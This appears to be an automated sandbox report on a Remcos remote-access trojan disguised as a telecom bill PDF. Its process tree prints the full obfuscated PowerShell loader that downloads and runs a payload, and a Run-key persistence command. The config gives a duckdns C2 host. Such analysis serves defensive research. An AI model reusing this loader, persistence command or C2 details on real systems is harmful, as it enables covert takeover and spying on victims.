Overview

overview

10

Static

static

1

11309-電�...df.vbs

windows7-x64

10

11309-電�...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    193s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    29-11-2024 01:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    11309-電信費電子通知單·pdf.vbs

  • Size

    33KB

  • MD5

    8f747ba4e105ce33a0231ed1eba4d216

  • SHA1

    dd82148b15070781c7412c5abcbb93e727085936

  • SHA256

    26ad41ff15319981a72e1a8e681c3c74fb011583eda81619f4cdf531cf5e221a

  • SHA512

    ea03c366ee9f3e9fcff7afbbb52d41863a582e91c37694d5d37a07025c66966f0f487e4458c3a2aff8ee96bc1e5b6184fd3a4030b61589d1cc74b9c07be6c079

  • SSDEEP

    768:ccuasC3UUmhgcFxKp70GNXaNDkJhZkPkqGM1ZVV1cCirNpVW4:VuasOmGS87NK9kJ/GpBPzcCiz

Score
10/10
remcosremotehostdiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

8766e34g8.duckdns.org:3782

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-93TSMD

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11309-電信費電子通知單·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kulturcentre229='Genapper';;$Labourability='Supplikant';;$Acquiet='Ulykkestilflde';;$Axial='Tarvs';;$agoraers=$host.Name;function Perlers($Morphically){If ($agoraers) {$Brugertesten=4} for ($Tomrum=$Brugertesten;;$Tomrum+=5){if(!$Morphically[$Tomrum]) { break };$Choriomas+=$Morphically[$Tomrum];$Murkrans='Fjortendedeles'}$Choriomas}function reservelgernes($Tomrumnaugurere){ .($Recruits) ($Tomrumnaugurere)}$Essentiality=Perlers 'HalvNDesieO laTHu.k.hy,nW';$Essentiality+=Perlers 'R ndeSa.gBT rmcDiatlBloki,erreFondnDataT';$Osmundaceous=Perlers 'Ru gMekseoTeksz Anai ethlFor.l T.vaBe,a/';$Forspises=Perlers ' B,jTFortlGours Ste1 Uma2';$Dispersionens100=' V c[Myo n olkE FretHels.Pyols ForeKsner DysVLittiBakkcRvreeFranpInsuOJordIRhe N Ha TAbriMS.etaFe eN St aO erGCifrE citRVeal]B gl:Fo e:mezzs,apoE T lcOutpuSa,drQua iGaraTUnreyk mpPUnberNonro.loptCortONon cslavoFragL,lin= Pol$DrunFAdv o.verRHarpSF,ndPP atIInd Sdag eGen.s';$Osmundaceous+=Perlers 'Katt5Path.S ru0 in I on(VasiWSinii SepnUdrydAlgioA.rewOpvosPast Hy iNOuteT pa Bux 1Un o0Mode.Tape0Unde;A ty ConWor viStornUng,6vi s4M.rc;Proe AutoxHesp6Pirn4Fe a; U.h IntarundevLamp:Arbe1Fur 3Fire1Sore.Muti0Snee) Eru orkGdad eSo,tc Groksi koV.ks/ Po.2forp0 Fe 1Germ0 Var0To.s1 De,0Nons1Bell PresF SoliDykkrPri.eUndefDyneoArbuxProg/J,mm1 .as3Unpr1Tort.Sal,0';$Archispermae=Perlers 'Kat,USy.oSS.alEBevgrSr,e- Paaa Bn GAstiEStttnSh.eT';$Bortadoptkmr=Perlers 'Und hTrictL getp eapEghjsDive: Oma/F rl/Tarod monr uliiI.flvVinde kst.evang MesoElonoManug IndlStu eTrop.befrcLithoBj,rmNon /Hneku Intcemer?Inkse AanxHal p veoH glr ap t Pse=svindZo noblinw B inOphvl ouso SekaPlowd S r&H roiWavedfri = Fyl1 pleGCneonA beY,eri3.orthNat jVrisbSupe3.erfSSitupP oaLStr ANon,bRoad9StocaBabeFa,suzSyndIDaglpDesuoTach9Has rByggUM ni3UceniTri TVerngMetau ncuxTubua Omb5SpriQ';$Mosgroet=Perlers 'Qui,>';$Recruits=Perlers 'FireIEndoeKuvex';$Tomrumnopinate='Skrubtudsen';$Plettedes207='\Oratoriers.Dia';reservelgernes (Perlers 'Sek.$Plagg TomlSamvOFortBSubdAoutrlFabr:C imPPin A WhecP,izH SkoyGennd.npoERenor ydMStataAs.rt SubO,orsIAmusdPapi= Ba $ Tr eE,urNStveV Rev:Bar ADestP sadP BrnDf mmaSlobtMedgaSkrh+Valm$A blPMuscL RegetabeT adotDenaeTereD,ondevirksudsy2 S.a0Scyp7');reservelgernes (Perlers 'aman$SamigBlanL nfOS.atB Pe AMissLHunk: MiraSambFMerfdMiniEVestLDichI tern arrg BruEDragr AfkNU.lieDangsStet= Bor$ SmaB PsaOImmeRRabaTCollAUd adForvOLat.PboliTRestKVitamDetorAdel. BeuSSaviPVigolIm,oIoverTBrev(pul $VarmMStemO Bi SRebaG krrNormOWomae PosTR wa)');reservelgernes (Perlers $Dispersionens100);$Bortadoptkmr=$Afdelingernes[0];$Bloedite=(Perlers ' ngl$Sy tGGib lrethoAfskBklipAKr eL yod: TraUSt.annonpAStyrP UniPHet lNoneiX,liqBelyU soneUn oDLorg=Be,oNMetaEUnsmwFrar-Nekro,uchbFantJElimeStorCDur t Snb S ltSSarcyKongsFibrTakv EMukam Dow. San$AbeneSaldsfrdiS S dE Cl.n JultsheeiKo.tAGassl,rneIToo T epuY');reservelgernes ($Bloedite);reservelgernes (Perlers 'unde$GrubUBen.nBru aNeutpBol p ChalSteriMesiqEntuu V leundodCent.MosqH W,ceSpeja g.ndArbeeReporAn es No [R,nt$BathATilprMillcKreshGen iPolosVegepMangeElger RigmTraia KrueGari]Del =hart$ ebO Cups OutmMetauSc,enHyped Cema hitc Dine Obeo oguKonss');$Inditer=Perlers 'Kvrn$Pre UBogsnOpenaPlumpMickpResml,akki AllqKo buUn.keEm adQ.ad.dis D notoUdskwSkinnEleflReavoSagia Trid conFPilliKnoxlFabrePoly(,oly$ heB ToooGaupr albt F ia LusdSalvorjsepCraztCelek Babmcentrydel,Brak$B ndUByttn ensi VotbMarcaMinin,ntikPubl)';$Unibank=$Pachydermatoid;reservelgernes (Perlers 'Forl$DekaGGum.lFl dO HarbForsAModel Ale:Teg SddmayOxamNKvajSAwabmV ndnPiscdFrdiEPr,onP.steJasm=U.co( ChetAngreSimuSadjutTran-San PFabja pecT UntH Lil ,rap$ForkuHypeNSemeIUd,rBpoddAArmsNRangkPara)');while (!$Synsmndene) {reservelgernes (Perlers ' Fin$Be kg Im lD deoTrukbAnlga NytlBarb:F.rhgskoeeAgtsn Fri= L.k$PyopS tentIr eaB oov O,er etaeBevgrmeeks') ;reservelgernes $Inditer;reservelgernes (Perlers 'BlomsBandT Am,aBinoRAf eTProm-WhoosBlotLNedbeH teE BetP.lam Atom4');reservelgernes (Perlers 'Demo$ lleG,etnLFor oskelb UnvA.lexl ews: Bi SMas,Y.escnAfteS Tenm Sa N eurdPh oeOverNMillePatb=sand( ndetLol.E F dsLer.TKass-UnidpTo,aAPrest Cerhk on Lysk$ StuUR,diNHerbIIdeobRumsa dinnAndokCore)') ;reservelgernes (Perlers ' sla$Aff G ,ffL icO Re bLetfATreplMach:FlorTCrenoMaskIDebrlC.phE polT limtIs ceInkaRPartN Fl EStatS Elu=Fors$ Ky,gAr.hLRug.oBoltBDyn,AKo.pL Ac,:SpedVSljfA EvenLexiDVenufprstOToterAfmaS ciryForsnPreliProcNUnitgSabesmazapCornLVedgaAmounAdeneEx,irAfvaNRa.iEUdto9mi j9till+G us+ vag% bac$Del,A Undf AurdSp ceFllelTromi SliNBarsGMes EWheeRHeten Irae VarSdest.O fscB.rfo ostU UnnNRu,tt') ;$Bortadoptkmr=$Afdelingernes[$Toiletternes]}$Divisionsstykkes=326774;$Hved=29566;reservelgernes (Perlers 'vand$AcnogGau lStoroMindbElevaSvmmLBina:Aff P ,krLAfski gengHorst.agif,elfOLegir eassPe emMan mFolcE O dlFinvSPreaETeg NKlasSPend Ba a=Ca.d Sax.gReinESount,uah-InglCNonmOph,tNcourTC,heeLilbnUndet na Tu,$FnatUPoronKaveI EngbGrupA horNVanwK');reservelgernes (Perlers 'Stu $ PrigImpolEarsoRennb apeaAutolLull:SalaSMawdoA.volForbeGunnnDatoe.mper emmg inai iseJde n.gersFilo Ud y= ns Delt[UndeSopsayHeelsO fitMi,eeBacom Kon.DispCSlyno ifnChefvReine Danr,kattHen ]Udd :Para:Us rFVaporFdseoUdlamChabB GnaaPte,sReche Dep6Pro.4BaskS amt B arC viiFladn ofogParr( Sen$ShapPLgeml BriiMyxogEpidtKramfJug.oSankrW atsSkammRegem,naceTranlB omsSem eSelsnLeucsB is)');reservelgernes (Perlers ' Re,$SerrG P oL ShaO Berb hypAFiellLaun:Ben.u SkrP,ricsFirstupliR NexeSydbeMelaT Amp R.ta=Medi Larr[SadlsAwinYCompsEr vTrequED alMCent.faertCoc,E UndXBandtHof,. SteEGangnUtroCU huO,iegdSquaiI ddnSprogUnde]Fenn:f ri:DetaAPolySKildCLigfI orcIbuty. SengBe.eeFi kTNedss HeaTFordRAfflISka.NPensGTred(Ki s$ kspsMo eOUnpaLAfgnEGhionAd,iEV mpRKamggAkkuI egneI.beNPoetSSnig)');reservelgernes (Perlers 'Hept$AnhigGlasLHavsOOverBSkaaaP,rpLE,tl:E.maB Geni Omro M jgK,raaTrias U,sS eade ofarAutoScond=Stak$Immiu Ri pPhytSFyratFeltRsandeNonjESpi.Tar m. CafS AnoUU.orb.mpls KeytSanirMa aiKassn UdsgSo t(Flyb$AmmoDBivaIBredvPik.IH.isshorniinbuoHomoNProlSCreusNoistsleeY afmkBelakBundE amtsHerk, F r$SluthaculV BrsE StoDJ ne)');reservelgernes $biogassers;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2164
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kulturcentre229='Genapper';;$Labourability='Supplikant';;$Acquiet='Ulykkestilflde';;$Axial='Tarvs';;$agoraers=$host.Name;function Perlers($Morphically){If ($agoraers) {$Brugertesten=4} for ($Tomrum=$Brugertesten;;$Tomrum+=5){if(!$Morphically[$Tomrum]) { break };$Choriomas+=$Morphically[$Tomrum];$Murkrans='Fjortendedeles'}$Choriomas}function reservelgernes($Tomrumnaugurere){ .($Recruits) ($Tomrumnaugurere)}$Essentiality=Perlers 'HalvNDesieO laTHu.k.hy,nW';$Essentiality+=Perlers 'R ndeSa.gBT rmcDiatlBloki,erreFondnDataT';$Osmundaceous=Perlers 'Ru gMekseoTeksz Anai ethlFor.l T.vaBe,a/';$Forspises=Perlers ' B,jTFortlGours Ste1 Uma2';$Dispersionens100=' V c[Myo n olkE FretHels.Pyols ForeKsner DysVLittiBakkcRvreeFranpInsuOJordIRhe N Ha TAbriMS.etaFe eN St aO erGCifrE citRVeal]B gl:Fo e:mezzs,apoE T lcOutpuSa,drQua iGaraTUnreyk mpPUnberNonro.loptCortONon cslavoFragL,lin= Pol$DrunFAdv o.verRHarpSF,ndPP atIInd Sdag eGen.s';$Osmundaceous+=Perlers 'Katt5Path.S ru0 in I on(VasiWSinii SepnUdrydAlgioA.rewOpvosPast Hy iNOuteT pa Bux 1Un o0Mode.Tape0Unde;A ty ConWor viStornUng,6vi s4M.rc;Proe AutoxHesp6Pirn4Fe a; U.h IntarundevLamp:Arbe1Fur 3Fire1Sore.Muti0Snee) Eru orkGdad eSo,tc Groksi koV.ks/ Po.2forp0 Fe 1Germ0 Var0To.s1 De,0Nons1Bell PresF SoliDykkrPri.eUndefDyneoArbuxProg/J,mm1 .as3Unpr1Tort.Sal,0';$Archispermae=Perlers 'Kat,USy.oSS.alEBevgrSr,e- Paaa Bn GAstiEStttnSh.eT';$Bortadoptkmr=Perlers 'Und hTrictL getp eapEghjsDive: Oma/F rl/Tarod monr uliiI.flvVinde kst.evang MesoElonoManug IndlStu eTrop.befrcLithoBj,rmNon /Hneku Intcemer?Inkse AanxHal p veoH glr ap t Pse=svindZo noblinw B inOphvl ouso SekaPlowd S r&H roiWavedfri = Fyl1 pleGCneonA beY,eri3.orthNat jVrisbSupe3.erfSSitupP oaLStr ANon,bRoad9StocaBabeFa,suzSyndIDaglpDesuoTach9Has rByggUM ni3UceniTri TVerngMetau ncuxTubua Omb5SpriQ';$Mosgroet=Perlers 'Qui,>';$Recruits=Perlers 'FireIEndoeKuvex';$Tomrumnopinate='Skrubtudsen';$Plettedes207='\Oratoriers.Dia';reservelgernes (Perlers 'Sek.$Plagg TomlSamvOFortBSubdAoutrlFabr:C imPPin A WhecP,izH SkoyGennd.npoERenor ydMStataAs.rt SubO,orsIAmusdPapi= Ba $ Tr eE,urNStveV Rev:Bar ADestP sadP BrnDf mmaSlobtMedgaSkrh+Valm$A blPMuscL RegetabeT adotDenaeTereD,ondevirksudsy2 S.a0Scyp7');reservelgernes (Perlers 'aman$SamigBlanL nfOS.atB Pe AMissLHunk: MiraSambFMerfdMiniEVestLDichI tern arrg BruEDragr AfkNU.lieDangsStet= Bor$ SmaB PsaOImmeRRabaTCollAUd adForvOLat.PboliTRestKVitamDetorAdel. BeuSSaviPVigolIm,oIoverTBrev(pul $VarmMStemO Bi SRebaG krrNormOWomae PosTR wa)');reservelgernes (Perlers $Dispersionens100);$Bortadoptkmr=$Afdelingernes[0];$Bloedite=(Perlers ' ngl$Sy tGGib lrethoAfskBklipAKr eL yod: TraUSt.annonpAStyrP UniPHet lNoneiX,liqBelyU soneUn oDLorg=Be,oNMetaEUnsmwFrar-Nekro,uchbFantJElimeStorCDur t Snb S ltSSarcyKongsFibrTakv EMukam Dow. San$AbeneSaldsfrdiS S dE Cl.n JultsheeiKo.tAGassl,rneIToo T epuY');reservelgernes ($Bloedite);reservelgernes (Perlers 'unde$GrubUBen.nBru aNeutpBol p ChalSteriMesiqEntuu V leundodCent.MosqH W,ceSpeja g.ndArbeeReporAn es No [R,nt$BathATilprMillcKreshGen iPolosVegepMangeElger RigmTraia KrueGari]Del =hart$ ebO Cups OutmMetauSc,enHyped Cema hitc Dine Obeo oguKonss');$Inditer=Perlers 'Kvrn$Pre UBogsnOpenaPlumpMickpResml,akki AllqKo buUn.keEm adQ.ad.dis D notoUdskwSkinnEleflReavoSagia Trid conFPilliKnoxlFabrePoly(,oly$ heB ToooGaupr albt F ia LusdSalvorjsepCraztCelek Babmcentrydel,Brak$B ndUByttn ensi VotbMarcaMinin,ntikPubl)';$Unibank=$Pachydermatoid;reservelgernes (Perlers 'Forl$DekaGGum.lFl dO HarbForsAModel Ale:Teg SddmayOxamNKvajSAwabmV ndnPiscdFrdiEPr,onP.steJasm=U.co( ChetAngreSimuSadjutTran-San PFabja pecT UntH Lil ,rap$ForkuHypeNSemeIUd,rBpoddAArmsNRangkPara)');while (!$Synsmndene) {reservelgernes (Perlers ' Fin$Be kg Im lD deoTrukbAnlga NytlBarb:F.rhgskoeeAgtsn Fri= L.k$PyopS tentIr eaB oov O,er etaeBevgrmeeks') ;reservelgernes $Inditer;reservelgernes (Perlers 'BlomsBandT Am,aBinoRAf eTProm-WhoosBlotLNedbeH teE BetP.lam Atom4');reservelgernes (Perlers 'Demo$ lleG,etnLFor oskelb UnvA.lexl ews: Bi SMas,Y.escnAfteS Tenm Sa N eurdPh oeOverNMillePatb=sand( ndetLol.E F dsLer.TKass-UnidpTo,aAPrest Cerhk on Lysk$ StuUR,diNHerbIIdeobRumsa dinnAndokCore)') ;reservelgernes (Perlers ' sla$Aff G ,ffL icO Re bLetfATreplMach:FlorTCrenoMaskIDebrlC.phE polT limtIs ceInkaRPartN Fl EStatS Elu=Fors$ Ky,gAr.hLRug.oBoltBDyn,AKo.pL Ac,:SpedVSljfA EvenLexiDVenufprstOToterAfmaS ciryForsnPreliProcNUnitgSabesmazapCornLVedgaAmounAdeneEx,irAfvaNRa.iEUdto9mi j9till+G us+ vag% bac$Del,A Undf AurdSp ceFllelTromi SliNBarsGMes EWheeRHeten Irae VarSdest.O fscB.rfo ostU UnnNRu,tt') ;$Bortadoptkmr=$Afdelingernes[$Toiletternes]}$Divisionsstykkes=326774;$Hved=29566;reservelgernes (Perlers 'vand$AcnogGau lStoroMindbElevaSvmmLBina:Aff P ,krLAfski gengHorst.agif,elfOLegir eassPe emMan mFolcE O dlFinvSPreaETeg NKlasSPend Ba a=Ca.d Sax.gReinESount,uah-InglCNonmOph,tNcourTC,heeLilbnUndet na Tu,$FnatUPoronKaveI EngbGrupA horNVanwK');reservelgernes (Perlers 'Stu $ PrigImpolEarsoRennb apeaAutolLull:SalaSMawdoA.volForbeGunnnDatoe.mper emmg inai iseJde n.gersFilo Ud y= ns Delt[UndeSopsayHeelsO fitMi,eeBacom Kon.DispCSlyno ifnChefvReine Danr,kattHen ]Udd :Para:Us rFVaporFdseoUdlamChabB GnaaPte,sReche Dep6Pro.4BaskS amt B arC viiFladn ofogParr( Sen$ShapPLgeml BriiMyxogEpidtKramfJug.oSankrW atsSkammRegem,naceTranlB omsSem eSelsnLeucsB is)');reservelgernes (Perlers ' Re,$SerrG P oL ShaO Berb hypAFiellLaun:Ben.u SkrP,ricsFirstupliR NexeSydbeMelaT Amp R.ta=Medi Larr[SadlsAwinYCompsEr vTrequED alMCent.faertCoc,E UndXBandtHof,. SteEGangnUtroCU huO,iegdSquaiI ddnSprogUnde]Fenn:f ri:DetaAPolySKildCLigfI orcIbuty. SengBe.eeFi kTNedss HeaTFordRAfflISka.NPensGTred(Ki s$ kspsMo eOUnpaLAfgnEGhionAd,iEV mpRKamggAkkuI egneI.beNPoetSSnig)');reservelgernes (Perlers 'Hept$AnhigGlasLHavsOOverBSkaaaP,rpLE,tl:E.maB Geni Omro M jgK,raaTrias U,sS eade ofarAutoScond=Stak$Immiu Ri pPhytSFyratFeltRsandeNonjESpi.Tar m. CafS AnoUU.orb.mpls KeytSanirMa aiKassn UdsgSo t(Flyb$AmmoDBivaIBredvPik.IH.isshorniinbuoHomoNProlSCreusNoistsleeY afmkBelakBundE amtsHerk, F r$SluthaculV BrsE StoDJ ne)');reservelgernes $biogassers;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%hydrofyt% -windowstyle 1 $Vedstaaelse=(gp -Path 'HKCU:\Software\wuhan\').Thailndere;%hydrofyt% ($Vedstaaelse)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%hydrofyt% -windowstyle 1 $Vedstaaelse=(gp -Path 'HKCU:\Software\wuhan\').Thailndere;%hydrofyt% ($Vedstaaelse)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1092

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    ab210a11932182c6e9237a150ac4175b

    SHA1

    784bc34144a290c69128f235b99d070902d21242

    SHA256

    fce25ccd7bab34a95c87a6af5f9cc1f4e3a00131bf93146867a3a2b8c4788902

    SHA512

    2c5ea20326635bf987c7e3c8641586216be221eea79d4bcfefb37c64a9fa1f6bbc6b005692ea803087aefe0a3699504e7c62d02e6568286fed48697cf6db9142

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\CabA9E8.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar4F3A.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FRYSGZ8CU6W9GSL0U8PR.temp
    Filesize

    7KB

    MD5

    0cd32c8c11cf069eb6d7ff90d2840912

    SHA1

    58ae5e75df24af481a14ec8324874a0cbcd30757

    SHA256

    c965343ed94d3d96ef269afe96505bb68159bd8e9132d7be1ed88903055efdb6

    SHA512

    c8364b84993e3cedaec9fe901235242de55fb9a9d17bf70f7592c8d7318a26b61d00414ed0d18c00651dc14c9298528a587959dd5b5ee5f58eac41bc78be4a3f

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Oratoriers.Dia
    Filesize

    463KB

    MD5

    c031c692c989185d697adbf656c85cfa

    SHA1

    0c0573d875ed1db5449112c436b37fcc6c6f4eff

    SHA256

    470be63037ef81774bcce1fc31763d7e7643b1c37dbc3ccfd688b056eb346a60

    SHA512

    4117ea35acafb3cc6d6117bd1a5adfaa617de6b0f2a78782965a687f3830331cd4d18464d26401b47f4bf27c42c19c5b8b0d3886fe1fcf92a92603d3f8f22189

    Download Submit

  • memory/1936-61-0x00000000006E0000-0x0000000001742000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1936-37-0x00000000006E0000-0x0000000001742000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2164-27-0x000007FEF623E000-0x000007FEF623F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2164-26-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2164-28-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2164-30-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2164-25-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2164-32-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2164-21-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2164-22-0x000000001B750000-0x000000001BA32000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2164-23-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2164-24-0x000007FEF5F80000-0x000007FEF691D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2164-20-0x000007FEF623E000-0x000007FEF623F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2696-36-0x0000000006600000-0x000000000AE43000-memory.dmp

    Filesize

    72.3MB

    Download